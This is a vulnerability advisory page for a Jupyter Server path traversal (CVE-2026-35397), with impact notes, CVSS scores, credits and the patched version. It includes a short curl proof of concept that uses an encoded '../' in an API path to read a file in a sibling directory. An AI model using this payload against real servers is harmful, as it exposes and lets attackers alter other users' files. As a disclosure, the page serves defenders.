Jupyter Server: Path Traversal via incorrect startswith() root directory check allows access to sibling directories

CVE-2026-35397 → View on GitHub ↗ View on CVE.org ↗ View on NVD ↗

Description

Summary

Jupyter Server <=2.17.0 can access directories sibling to the root directory, if it starts with the root dir's name.

PoC

Minimal:

.
├── test/              &lt;- root directory.
│   └── test.txt
└── testtest/
    └── secret.txt     &lt;- file to exfiltrate that we should not be able to access via API

HOST=&quot;http://localhost:8888&quot;
TOKEN=&quot;&quot;
SIBLING=&quot;testtest&quot;
TARGET=&quot;secret.txt&quot;

curl -s -X POST \
  &quot;$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints&quot; \
  -H &quot;Authorization: token $TOKEN&quot;

Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006

Impact

It is possible for an authenticated user to access content outside the server's root_dir in siblings directories sharing the same prefix as the root_dir. The attacker can escalate access, reading, writing, and deleting from sibling directories.

This can have a tangible impact for deployments using predictable naming scheme with multi-tenant server, for example user1, user2, user3, ..., user10 etc, as user1 could access and modify files of all user10 - user19 and higher.

In a hypothetical system where users can choose a name of their folder, an attacker could choose a single-letter username to gain access to a significant number of sibling directories.

Workarounds

Use folder names that do not overlap.

Acknowledgments

Thank you to @stef41 for providing a useful PoC.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-05-05 16:49:10 UTC
Updated
2026-06-06 00:23:56 UTC
GitHub reviewed
2026-05-05 16:49:10 UTC
NVD published
2026-05-05 20:16:38 UTC

EPSS Score

Score Percentile
0.06% 18.58%

CVSS Scores

Base score Version Severity Vector
7.1 3.1
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:L)
Might cause slowdowns, glitches, or partial disruption—not a full brick.
7.6 4.0
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:P)
Additional preconditions must be present for exploitation.
Privileges required (PR:L)
Low privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:L)
Limited availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

Type Value
GHSA GHSA-5789-5fc7-67v3 ↗
CVE CVE-2026-35397 ↗

CWEs

CWE id Name
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Credits

  • Yann-P (remediation_developer)
  • Carreau (coordinator)
  • stef41 (finder)
  • krassowski (coordinator)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip jupyter-server <= 2.17.0 2.18.0

References

cvelogic Threat Intelligence